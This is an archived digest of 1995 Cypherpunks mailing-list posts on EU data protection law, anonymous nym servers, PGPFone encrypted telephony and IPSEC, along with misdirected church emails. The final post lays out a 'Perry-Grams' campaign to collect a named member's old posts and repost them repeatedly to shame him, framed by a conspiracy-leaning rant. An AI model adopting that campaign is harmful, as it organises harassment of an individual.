Date: Fri, 11 Aug 95 12:13:57 PDT
To: CypherPunks <cypherpunks@toad.com>
Subject: Re: EU Data Protection
In-Reply-To: <199508041840.OAA01729@clark.net>
Message-ID: <9508112013.aa23273@salmon.maths.tcd.ie>
MIME-Version: 1.0
Content-Type: text/plain


In message <199508041840.OAA01729@clark.net>, Ray Cromwell writes:
>  Just more evidence for why even "well meaning" policywonks are dangerous.
>Take for instance the rule that "data must be kept up to date and accurate"
>How up to date and what is accuracy? So if I have a commercial web page
>which records transactions on my server, and I stop logging and keep
>year old records, do some statistic processing on them, I am in
>violation for having stale data. 

	If I remember the Irish data protection laws accurately, the idea
is to keep inaccurate data on individuals (and, possibly, companies). I
doubt if data which cannot be used to identify individuals would qualify.
(There is a small exemption for clubs, I can't remember the details exactly.)
Assuming the same model is being proposed where you are, I doubt if it would
mean you could be prosecuted for holding old transaction records, just ones
that either (i) are out of date because someone may be listed as not having
paid when they have or (ii) record transactions that didn't take place.

>  And what the hell is "accurate" data? All information about other people is 
>subjective. I should be entitled to record any statistics about you for my 
>use that I want. Just by interacting with me you transmit information. If
>I interact with you and get the "wrong impression" about what type of
>person you are, am I in violation for storing inaccurate data? (e.g. if
>I write in my computerized diary "I think John Smith is a jerk.")

	I think you miss an important point; your opinion is subjective, but
data can relate to objective facts (e.g. credit records). Would you take the
same stance if a credit bureau claimed that you couldn't pay back half the
loans you took out?

	What worries me about the *lack* of some form of data protection
legislation is that it allows someone to build up a database of information
which is a mishmash of truth, misunderstandings and lies. How would you feel if
"Concerned Citizens against Cryptography" compiled a list of all members
of this list, branding them as `dangerous, possibly criminal subversives'?
What if that opinion was spread to other databases? How about the police
investigating you because of this kind of database?

>  How will this law affect reputation servers? If my reputation server
>has what you consider a bad review of you, am I in violation?

	Personally, I wouldn't take a reputation server seriously; after all
if you labelled me a jerk, I could do the same to me on my own server! :-)

	Seriously, I don't think something as frivolous as a reputation
server should be illegal, but anything that records information about
individuals that could result in harm to said individuals (e.g. by falsely
branding them a bad credit risk, falsely claiming them to have a criminal
record, etc.)

>  Privacy should be implemented via cryptography, not obscure political
>machines which are doomed to fail and produce a black market for 
>personal data anyway.

	I'm sorry, but I don't think this marked metaphor holds here.

	Derek Bell




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vicki Penny <penny@tyrell.net>
Date: Fri, 11 Aug 95 18:41:48 PDT
To: epi@tyrell.net
Subject: Access
Message-ID: <199508120137.AA29946@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain



> Date: Fri, 11 Aug 1995 09:54:57 -0400
>From: FrFunston@aol.com
>Message-Id: <950811095455_52556775@aol.com>
>To: penny@tyrell.net
>Subject: Re: A quick prayer
>Status: RO
>
>In Anglican Forum, you wrote:
>
>>My son and I also like to sit on the back deck in the evening when it is
>>cool enough to watch and listen to the wonders of creation.
>
>Vicky -- when recently in Kansas City has this been possible?

Actually, it's been rather hot, lately!  I do manage to get out some evenings.
We have two great big elm trees that provide great shade.  I also like to
get out early in the morning and do my prayers!  Thanks, too, for your
invitation to visit on Sunday - this is difficult because I am the organist
at St. Peter's!  But, if I ever have the chance, I would really like to
do that.  Maybe there is a weekday service some time?
>
>By the way, what internet access do you use?  I'm on AOL but for some of my
>uses, a less costly Web surfer would be really great.  I've had some
>difficulty finding what's available locally.

My husband has subscribed to a service called Tyrell that is based here in
town that connects to the Internet.  Call (816) 454-6788 with your modem
and log in as "info" for rates and features.  They offer thirty hours of
connect time a month for $10.00 and $.75 for every hour used after that.
It's not as user friendly as AOL and we have an older computer set.  You
can get something in windows that Tyrell supports that will make it very
user friendly.

There is a one time activation charge of $9.00.  You can also pay a lump
sum of $90.00 per year for the same 30 hours a month.

God Bless!  Vicki




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vicki Penny <penny@tyrell.net>
Date: Fri, 11 Aug 95 18:41:52 PDT
To: epi@tyrell.net
Subject: hard hymns
Message-ID: <199508120137.AA29980@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain



>Ok, I guess I'll jump in here, too.  Since I am an organist, I will
list a few hymns I've noticed the congregation having difficulty
singing:

#56  O Come, O Come, Immanuel  - in the new hymnal, it has been changed
to be more authentic, but since people are used to the 1940 timing, they
stumble every time.

#688  A Mighty Fortress - Same reason as above.

#208  The Strife is O'er - they do great on the verse, but really, I
have never figured out what they do on the Antiphon!!!  They certainly
aren't with me!

In our congregation - any hymn not previously in the 1940 hymn book!
They always groan afterwards - "we don't know that one."  Also, "we
can't do a new hymn at the beginning, the choir would stumble coming in",
"we can't do a new hymn at the Gospel - too important a place", we can't
do a new hymn post communion - it would interfere with devotion and
thanksgiving after Eucharist and we don't want to irritate people" and
"we can't do a new hymn at the end because the choir would stumble and
we need to end on a familiar uplifting note."  If anyone else has
experienced this sort of thing, I would welcome suggestions.  I am hoping
that our new rector, when he arrives in October, will also be able to
help!

Vicki Penny
St. Peter's - Kansas City




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Penny <penny@tyrell.net>
Date: Fri, 11 Aug 95 18:48:21 PDT
To: cypherpunks@toad.com
Subject: Oops, Sorry
Message-ID: <199508120143.AA00904@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain



Sorry about the noise. The letter from Vicki Penny was from a snarled
up script that ran astray.

Cordially,

[-------------------------------------------------------------------------]
[  Public pgp-key: email penny@tyrell.net with subject as 'send pgp-key'  ]
[       My opinions are mine. I have scored 90% on the Turing Test.       ]
[                   Alan Penny, penny@tyrell.net                          ]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryan Strawser <feanor@anduin.gondolin.org>
Date: Fri, 11 Aug 95 19:06:39 PDT
To: alt.privacy.anon-server@canaima.ME.berkeley.edu
Subject: Nym Server Development....
Message-ID: <199508120204.VAA13172@anduin.gondolin.org>
MIME-Version: 1.0
Content-Type: text


John Fleming, along with a bit of support help from myself, is developing
a nym server that he is intending to release to the public once we are
satisfied with the performance and the state of the code.

At this point and time, John has pushed the code to the point where we
have an experimental nym server operating that is being constantly
refined and features added. Along the same lines, I am presently
working on solid documentation for when the nymserver is ready for
public use, and for the later public release of the code.

John created a mailing list for those interested in contributing to the
development of his nymserver and as a forum for discussion of nymserver
related issues.  So far, there have been few folks subscribed, and no
answer from those that are presently subscribed to the list.  I find
this rather disappointing.

This is your chance to get involved in developing this server.  There has
been a lot of interest expressed in nymservers on this list previously,
as well from other folks that presently use the type I and II remailers
that are running today.  Just like the other types of anonymity out
there, a nymserver has many viable reasons for existence.  The lack of
publicly available code for such a server, as there is for remailers,
should motivate us to get behind John and his efforts.

To subscribe to the nymserver development & discussion forum, send
a message to majordomo@sephiroth.org with the line "subscribe nyms
<your name>" in the body of the message.  Questions about the
nymserver should be directed to that list so that all can be involved
in the development.

Thanks for your input,

Bryan



-- 
Bryan Strawser, Gondolin Technologies, Bloomington, IN USA        Remember Waco
feanor@gondolin.org                                            Live free or die



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 11 Aug 95 21:36:27 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: PRZ encrypted voice software release imminent
Message-ID: <v02120d00ac51eb0ea681@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:59 8/11/95, Vladimir Z. Nuri wrote:

>the real holy grail for voice communication encryption is
>when this stuff starts to get integrated into the real
>phone system, or people start making hardware that is
>cheap and self contained and idiot proof. "but it's difficult
>to make anything foolproof, because fools are so ingenious" <g>
[...]
>when someone invents cheap hardware that you can just plug
>on top of any existing phone, i.e. "the phone adaptor", TPA?,
>*that's* when the world is going to go crazy with crypto.
>all this stuff that requires lots of hardware can be used,
>but the thing that will cause *everyone* to use it is when
>someone invents a TPA. I'm very, very surprised that no
>one has tried to do this yet.

As some of you know, I work for a LAN-Telephony company. One of our
products is a hardware based computer telephony product that we will be
able to provide at less than $100 per node. The product contains a CPU as
well as a DSP and is ideally suited for voice transmission with encryption
over networks.

We intend to make this product fully interoperate with software based
PGPFone implementations and also lending our computer telephony experience
to the PGPFone development team. This cooperation will provide hundreds of
thousands of corporate users with PGPFone compatible, rock solid, call
security at a fraction of the cost of today's "secure" phones. Our
expertise will also help improve the performance of the software based
freeware PGPFone implementations.

Sorry, I am unable to provide more details at this point.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryan Strawser <feanor@anduin.gondolin.org>
Date: Fri, 11 Aug 95 19:50:46 PDT
To: feanor@anduin.gondolin.org
Subject: No Subject
Message-ID: <199508120242.VAA00212@anduin.gondolin.org>
MIME-Version: 1.0
Content-Type: text/plain


In a previous message, Timothy C. May said...
> 
> What is your working definition of "nym server"?

There have been discussions concerning this before both on here
and other mailing lists, such as remailer-operators.  A nym
server is an operation similar to anon.penet.fi, but more secure.  Sameer
has two of these operating now that uses PGP encrypted reply blocks
and such.  [omega.c2.org and alpha.c2.org, both of which use different
operating methods] 

What John is attempting to do is have a nymserver like anon.penet.fi,
where folks can create an alias and send/receive mail/postings to it.  
However, unlike Julf's system, a secure nymserver would prevent the owner 
from being able to divulge who the real-life person is behind the
alias because of the PGP encrypted reply block and other options
involved.

Bryan

-- 
Bryan Strawser, Gondolin Technologies, Bloomington, IN USA        Remember Waco
feanor@gondolin.org                                            Live free or die




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@valhalla.phoenix.net (Anonymous)
Date: Fri, 11 Aug 95 19:45:22 PDT
To: cypherpunks@toad.com
Subject: Euro Comm Adopts Privacy Directive (NewsClip)
Message-ID: <199508120245.VAA05377@ valhalla.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain




European Commission Adopts Privacy Directive


Brussels, Aug. 11, -- The European Commission is now well on
its way towards affording a high level of protection to
personal data held on computer systems, following the formal
adoption of a Directive on the protection of personal data,
Newsbytes has learned.
 
"I am pleased that this important measure, which will ensure
a high level of protection for the privacy of individuals in
all Member States, has been adopted with a very wide measure
of agreement within the Council and European Parliament," said
EC Single Market Commissioner Mario Monti, announcing the
measure.
 
According to Monti, the Directive will also help to ensure the
free flow of information society services in the "Single
Market" by "fostering consumer confidence and minimizing
differences between member states' rules."
 
"Moreover, the text agreed includes special provisions for
journalists, which reconcile the right to privacy with freedom
of expression," he said, adding that the member states must
transpose the Directive within three years (i.e., write it
into their own legislation), "but I sincerely hope that they
will take the necessary measures without waiting for the
deadline to expire so as to encourage the investment required
for the information society to become a reality."
 
Monti claims that the Directive will establish a "clear and
stable" regulatory framework necessary to guarantee free
movement of personal data, while leaving individual EU
countries room for maneuver in the way the Directive is
implemented.
 
According to the Directive, free movement of data is
particularly important for all services with a large customer
base and depending on processing personal data, such as
distance selling and financial services.
 
In practice, however, banks and insurance companies process
large quantities of personal data on such highly sensitive
issues as credit ratings and credit-worthiness. If each member
state had its own set of rules on data protection, for
example, on how data subjects could verify the information
held on them, cross-border provision of services, notably over
the information superhighways, would be virtually impossible
and this extremely valuable new market opportunity would be
lost, the EC claims.
 
According to the EC, the Directive aims to narrow divergences
between national data protection laws to the extent necessary
to remove obstacles to the free movement of personal data
within the EU. As a result, any person whose data is processed
in the EC will be afforded an equivalent level of protection
of his rights, in particular his right to privacy,
irrespective of the member state where the processing is
carried out.
 
The EC claims that, until now, differences between national
data protection laws have resulted in obstacles to transfers
of personal data between EC member states, even when these
countries have ratified the 1981 Council of Europe Convention
on personal data protection. This has been a particular
problem, the EC notes, for multinational companies wishing to
transfer data concerning their employees between their
operations in different member states.
 
According to the Commission, such obstacles to data transfers
could seriously impede the future growth of information
society services.
 
The Directive establishes the principle of "fairness," so that
a collection of data should be as transparent as possible,
giving individuals the option of whether they provide the
information or not.

The Directive requires all data processing to have a proper
legal basis. The legal grounds defined in the Directive are:
consent, contract, legal obligation, vital interest of the
data subject, and the balance between the legitimate interests
of the people controlling the data and the people on whom data
is held (i.e., data subjects). This balance gives member
states room for maneuver in their implementation and
application of the Directive, the Commission claims.
 
Press & Reader Contact: European Commission, +32-299-1111

--






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 11 Aug 95 22:09:28 PDT
To: Ray Cromwell <vznuri@netcom.com (Vladimir Z. Nuri)
Subject: Re: PRZ encrypted voice software release imminent
Message-ID: <v02120d01ac51ef81b1df@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 14:42 8/11/95, Ray Cromwell wrote:

>I would like to see a secure voice communication protocol that is divorced
>from the particular details of the algorithms used (although a
>base level of some voice compression technique + DES + RSA will have to
>be used) That way, new and better algorithms can be dropped in depending
>on the network used (modem, ipx, tcp/udp, etc) and the bandwidth required
>(CELP vocoder, MPEG-audio, lossless encoding, progressive PCM, etc)

The codec used is at the very core of any computer telephony system. A
standard that doesn't specify the codec(s) can be little more than a
standard on message formats, which will be of little value if the other
side doesn't implement the same codec.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 11 Aug 95 22:09:29 PDT
To: vznuri@netcom.com>
Subject: Re: PRZ encrypted voice software release imminent
Message-ID: <v02120d03ac51f1491d1b@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 15:59 8/11/95, Steve Bryan wrote:
>Even without PGPFone I have thought for a while that computer based
>telephony is getting ready to take off. Combining CallerID, customized
>call handling, high quality speakerphone capability and a truly useful
>personal directory (TouchBase Pro is too sluggish, but getting there)
>there were already the ingredients of substantive usefulness. If you can
>add in street maps fetched with an AppleEvent or even a QTVR enhanced map
>then you get something that might make even an AT&T ad envious. Adding
>complete privacy (relative to previous levels available) and possibly
>authentication makes this a very big event.

You will, and the company that will bring it to you...won't be AT&T.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Snyder <rsnyder@janet.advsys.com>
Date: Fri, 11 Aug 95 20:15:06 PDT
To: dneal@usis.com>
Subject: Re: IPSEC goes to RFC
In-Reply-To: <Pine.BSI.3.91.950810134314.7478B-100000@usis.com>
Message-ID: <199508120315.XAA14852@janet.advsys.com>
MIME-Version: 1.0
Content-Type: text/plain


dneal@usis.com said:
> I'd like to also volunteer to do the linux port, whether it be 
> coordination patches, hacking code, finding people, whatever.

> Also, if other cypherpunk subscribers feel that this topic is 
> inappropriate for the list (not likely) or that it would generate too 
> much traffic for the list (?) I can create a new majordomo list 
> dedicated to the effort in 10 minutes.

The detailed discussions of planning such a port probably are inappropriate 
for cypherpunks.  Lord knows we need to conserve space for Foster conspiracy 
theories.....

I think a separate list might not be a bad idea.  Either on your server or on 
something like vger.rutgers.edu, which is pretty much the linux mailing center 
of the universe right now. :-)

We should probably also check on comp.os.linux.networking and linux-net@vger.rutgers.edu to make sure someone isn't already working on this.

The ideal author would be outside the US, since the patches would need to be mailed to Linus for inclusion in the kernel, and that brings up some interesting ITAR issues.

Bob





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jcaldwel@iquest.net (James Caldwell)
Date: Fri, 11 Aug 95 22:36:55 PDT
To: vznuri@netcom.com
Subject: Re: PRZ encrypted voice software release imminent
In-Reply-To: <v02120d06ac515d75289e@[199.2.22.120]>
Message-ID: <lSCLw4NQnoAb083yn@iquest.net>
MIME-Version: 1.0
Content-Type: text/plain



>Of course, if it was a substantial improvement over the
>other "Internet Phone" stuff that's out there, and had
>a good way of dealing with switching, etc., then people
>would use it to make "free" l.d. phone calls on the net,
>and the cryptography would get a free ride.


>Generally, you are right in suggesting that anything that
>requires people to crawl behind their computers, attach
>new cables, purchase and debug a sound card under Windows,
>and generally engage in techno-weenie hardware manipulations
>will have less appeal than something plug and play. Even
>given the extremely user-hostile elements of PGP the software,
>I would be surprised if PGPFone became as popular.

Hmm, opportunities for 'consulting fees' abound in setting up PGP, PGPFone
is another one. ;-)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 12 Aug 95 00:07:13 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Nym Server Development....
In-Reply-To: <ac515e9d07021004af05@[205.199.118.202]>
Message-ID: <199508120702.AAA25233@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Describe for us what you have in mind for "nym servers" and why they are
> important, then maybe more folks will get involved.
> 

	I believe that Bryan is referring to nym servers along the
lines of alpha and omega (.c2.org) The omega source isn't publicly
available because frankly I'm pretty ashamed of how ugly and nasty the
program is (I wrote it more than a year ago, and my "improvement" in
my perl programming skill shows if you compare that code with code
I've written lately in perl). I'm not sure why the alpha source isn't
available, as it isn't my server. (It runs on my ISP because Matt
Ghio, who runs it, has an account here)

	The alpha and omega servers share the fact that someone can
register a nym anonymously and give the server an
encrypted-reply-block rather than a real email address. This is secure
to the court-order form of attack against the anonymous identity, as
opposed to the penet server, which is not secure against court-order
attack. (There is still very much work that needs to be done towards
defeating replay & traffic analysis attacks on anonymous forwarders on
the server)


-- 
sameer						Voice:   510-601-9777
Network Administrator				Pager:	 510-321-1014
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 11 Aug 95 16:35:37 PDT
To: cypherpunks@toad.com
Subject: Re: PRZ encrypted voice software release imminent
Message-ID: <199508112335.BAA00874@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Responding to msg by sbryan@maroon.tc.umn.edu (Steve Bryan) on 
Fri, 11 Aug  3:59 PM

>A lot of people who 
>don't usually think or talk about fundamental issues 
>of privacy and technology will be doing so next week.


PRZ is due to receive a prestigious design award for PGP this 
month, which may give a boost to public awareness of crypto's 
value for privacy.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@khijol.intele.net>
Date: Sat, 12 Aug 95 00:51:24 PDT
To: Ford Prefect <remailer@bi-node.zerberus.de>
Subject: Re: your mail
In-Reply-To: <m0sgh1i-00029BC@bi-node.zerberus.de>
Message-ID: <Pine.3.89.9508120103.A2501-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 11 Aug 1995, Ford Prefect wrote:

> perry, of course, is a dysfunctional human "cipher" himself,

I always thought he was an AI program that someone put in a lot of 
abusive crap to be funny - then someone accidentally let it loose on the 
net ;)
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@khijol.intele.net>
Date: Sat, 12 Aug 95 00:56:15 PDT
To: Anonymous <anon-remailer@utopia.hacktic.nl>
Subject: Re: F*** FOSTER
In-Reply-To: <199508102345.BAA14099@utopia.hacktic.nl>
Message-ID: <Pine.3.89.9508120138.B2501-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


Oh, who gives a rat's ass?  Just hit 'd' and be done with it...
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 12 Aug 95 01:59:17 PDT
To: Derek Bell <dbell@maths.tcd.ie>
Subject: Re: EU Data Protection
Message-ID: <199508120857.BAA11353@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>At 7:13 PM 8/11/95, Derek Bell wrote:
>>        I think you miss an important point; your opinion is subjective, but
>>data can relate to objective facts (e.g. credit records). Would you take the
>>same stance if a credit bureau claimed that you couldn't pay back half the
>>loans you took out?

There's a difference between what information you maintain for internal purposes
and what information you give to other people.  I don't really _care_ what nonsense
a credit bureau may have in their internal records, only what they tell other people
about me.  If they somehow think I'm a bankrupt Communist space alien, but tell their
credit-rating customers that my credit looks ok, it's not my business.
If they use their own internal records to decide that _they_ don't want to lend me money,
well, somebody else will get my business; it's in their interest to be accurate.

A more interesting question is whether reporting credit transactions in private
communications with their data customers constitutes libel if they inaccurately
say bad things about me, and do I have a right to force them to tell me.
Tim May thinks this kind of forced speech violates the US Constitution;
I'm less bothered by laws telling corporations what to do (since corporations
are fictional creations of the state) than by laws telling human-owned businesses
or individual humans what to do.

Tim May replies:
>Think about it: the name "data privacy" sounds good, at first blush, but
>what it really means is that my records are not private, that my records
>are inspectable by government agents to see if I have stored any illegal
>facts or correlations.

Yeah.  If you register your computer and its data with the Data Police,
they have the right to inspect it.  If you _don't_ register, that gives
them reasonable suspicion to believe that you might have "illegally
unregistered data" on the machine, so they have the power to inspect it.
Kind of like proving you're not a witch....
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

Storyteller makes no choice - soon you will not hear his voice.
His job was to shed light, and not to master.      RIP, Jerry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 12 Aug 95 01:59:55 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: PRZ encrypted voice software release imminent
Message-ID: <199508120857.BAA11361@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:59 AM 8/11/95 -0700, you wrote:
>the requirements for live voice encryption are pretty significant:
>a fast computer and fast modem. this alone is only a subset
>of those people using PGP right now. 

The tradeoffs are speech encoding quality, and we basically crossed that
line a year or two ago for the high end, and are heading toward mass capability.
9600 baud high-quality speech takes lots of crunching, 13.3 kbps GSM takes
a Sparc 2 or maybe a Pentium, 16 kbps ADPCM is dirt trivial and can probably
run on an 8086.  The coding options with Nautilus run on 386s.
And you can get by with less if you're willing to put up with half-duplex.

Yes, lots of us aren't using modems faster than 14400 now, but you can get a 
14.4/19.2 modem at Fry's for well under $100.  (19.2 is unfortunately
not quite enough to 16 kbps, given start and stop bits, unless you do synchronous
or start playing with V.42 a bit, but it's close.)  Sound cards are down in the $50 range,
and give you the analog/digital conversion as well as some computation.
Adding a sound card is a bit of work, given the wonderful operating systems
on many PCs :-), but folks put them in along with CDROMs so they can run
all the latest multimedia applications, or high-end versions of DOOM.

Anybody who needs to avoid government or business-competitor eavesdroppers
can probably afford $150 in extra hardware for their PC.

This doesn't apply to international communications or folks in the boonies,
where it's hard to get full performance out of modems, so you Commie
spies and Earth First!ers will need more expensive high-tech equipment :-)...
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

Storyteller makes no choice - soon you will not hear his voice.
His job was to shed light, and not to master.      RIP, Jerry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <rogaski@phobos.lib.iup.edu>
Date: Fri, 11 Aug 95 23:53:29 PDT
To: feanor@anduin.gondolin.org (Bryan Strawser)
Subject: Re: your mail
In-Reply-To: <199508120242.VAA00212@anduin.gondolin.org>
Message-ID: <199508120653.CAA03702@phobos.lib.iup.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- From the node of Bryan Strawser:
: 
: 
: What John is attempting to do is have a nymserver like anon.penet.fi,
: where folks can create an alias and send/receive mail/postings to it.  
: However, unlike Julf's system, a secure nymserver would prevent the owner 
: from being able to divulge who the real-life person is behind the
: alias because of the PGP encrypted reply block and other options
: involved.
: 

But how does one ensure that no logs are kept on the server, and how
does the encrypted reply block work (I can't see how this will shield
identity from both of the communicating parties)?

- -----
#include <std_disclaimer.h>

Mark Rogaski           100,000 lemmings     rogaski@phobos.lib.iup.edu 
aka Doc, wendigo        can't be wrong!     http://www.lib.iup.edu/~rogaski/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMCxP1x0c4/pqJauBAQFvhAP+OibktWOj8RPdOhDF88Zse84S+AuUnCMv
jLbvJ7q6cJELtZ6cXkv24iVLRPD+EyTkZ6V4BWEPhXDpeKtYhcZf0fdRyM2QCdpR
kNvygkCgrMiynaDQZqkeWzucj54wmZ5U1s9+wH6hcdp5E17+AnZDPrtit6OENwFw
87dLMAHPmf4=
=EQGr
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gjeffers@socketis.net (Gary Jeffers)
Date: Sat, 12 Aug 95 01:24:15 PDT
To: cypherpunks@toad.com
Subject: PERRY-GRAMS (Does Perry speak for Cypherpunks?)
Message-ID: <199508121046.FAA06728@mail.socketis.net>
MIME-Version: 1.0
Content-Type: text/plain


                      PERRY-GRAMS
            (Does Perry speak for Cypherpunks?)


   I have a solution to the Perry off-topic problem: PERRY-GRAMS.

   I got this idea from the following text of Tim May's:

----------------- start Tim May text ---------------------------------
Perry is Perry. He has certainly written his share of rants and "off-topic"
posts, as have we all. Literally thousands of his posts over the past 3
years reside on my disk drives, and certainly until recently most of them
were not about writing code.
--------------------end Tim May text ---------------------------------


   Firstly, what is a Perry-Gram?

1. Find a long Cypherpunk post by Perry that is in your opinion,
     "off-topic". Keep the header.

2. Add the full post of Perry's "Ciphergroupies" post which I have
   thoughtfully included at the end of this post. Include header.

3. Add text asking Perry to defend his off-topic post as appropriate to
     Cypherpunks.

   For true effectiveness, you really need to post several Perry-Grams
 per provocation.

   To be really effective, Cypherpunk "Ciphergroupies" will need to
do a little networking. Most don't have much in the way of Cypherpunk
archives - but some do. If you want to make some Perry-Grams but lack
the archives, then post a call to Cypherpunks to have someone with
archives to send you as many long, "off-topic" posts by Perry as they
can. With a little cooperation, we can build up a data base of Perry
"off-topic" posts. Unfortunately, my Cypherpunk archives were lost,
so I won't be much help. - I am at a loss for Perry's words. However,
a lot of Cypherpunks keep lots of old posts. I am willing to store at
least one 1.44 meg diskette of Perry-Grams in compressed .zip format.
Trade them like baseball cards. Of course, with computers, that's
sharing :-).

   If you're having problems getting people with archives to help you,
then contact Tim May. I suspect that Tim (Bless his Generosity) will be
willing to dig up some potential Perry-Grams material for you.

   Treasure your Perry-Grams. They are not merely for the current Perry
threads. If you save them, then you can whip them out in the future when
Perry does more of his nasty, hateful "off-topic" attacks. I recommend
Perry-Gram diskettes. I think this is the best way to bell the Perry-
cat. Let Perry deny his own words! :-) :-) :-)

Crypto relevance: Cypherpunks cannot be well described as just a list for
techno freaks who love Crypto. I believe that most of the heavy crypto
coders & theorists would be just as happy to be working on AI, linkers,
natural language parsers, etc.. - were it not for POLITICAL
CONSIDERATIONS! I think most of the active people on Cypherpunks despise
central political control & are active in order to stop it. Cypherpunks
is motivationally driven by this political consideration. Perry did not
spend $50k & "spend months of [his] life struggling to..." just because
he thinks that computer crypto is "RAD KOOL".

   Then why drive out our polemists & our conspiracy buffs? Conspiracy
theory is the theory of the working of states by non-establishment
writers. Our political writers are "crying fire" when "danger of
fire" is evident to them. They MUST give out the alarm. Most people
are ignorant of the degree of danger that we are in from the power-
mad illegitimate United States "Federal" State. Thank God for
"extremist right-wing kooks" who do conspiracy writing. They may yet
save us from establishment "left-wing Liberal kooks" who seem desperate
to bankrupt us & turn America into a police state. Not that the
Republicans are much better. They seem to be on a mission to cut
Democratic spending by 5%. -  As the Russians say "Prophylactic
politics." - When there is public discontent with the elite's policies,
give the people an insincere group of politicians to cater to the public's
grievances.

-------- start of Perry E. Metzger "Ciphergroupie" post ----------
Received: from toad.com by relay3.UU.NET with SMTP
	id QQzcct17133; Wed, 9 Aug 1995 21:53:27 -0400
Received: by toad.com id AA08720; Wed, 9 Aug 95 18:35:44 PDT
Received: from panix4.panix.com by toad.com id AA08714; Wed, 9 Aug 95 
18:35:40 PDT
Received: from panix2.panix.com (panix2.panix.com [198.7.0.3]) by 
panix4.panix.com (8.6.12/8.6.12+PanixU1.1) with SMTP id VAA03975; Wed, 9 Aug 
1995 21:34:13 -0400
Message-Id: <199508100134.VAA03975@panix4.panix.com>
To: KALLISTE@delphi.com
Cc: cypherpunks@toad.com
Subject: Re: Only 1/3 of Government Computers Down So Far
In-Reply-To: Your message of "Wed, 09 Aug 1995 12:29:59 EDT."
             <01HTVAYUCH6W90PB08@delphi.com>
Reply-To: perry@piermont.com
X-Reposting-Policy: redistribute only with permission
Date: Wed, 09 Aug 1995 21:34:12 -0400
From: "Perry E. Metzger" <perry@panix.com>
Sender: owner-cypherpunks@toad.com
Precedence: bulk


KALLISTE@delphi.com writes:
> 	Many people are interested in cryptology because they don't
> want the NSA (among others) invading their privacy.

So, the question is this: do people want to follow the standard "ooh,
let's shudder at the conspiracy theories" track, and fall flat on their
faces, or do they want to see cryptography implemented and widely
deployed?

The noise levels on this list have driven most of the important crypto
types off it. People like Phil Karn and Steve Bellovin, who actually
implement stuff, aren't here any more. Instead, we have a vast flood
of ciphergroupies who love to post the latest funny bit they found on
the net, discuss whether David Koresh was being unfairly persecuted,
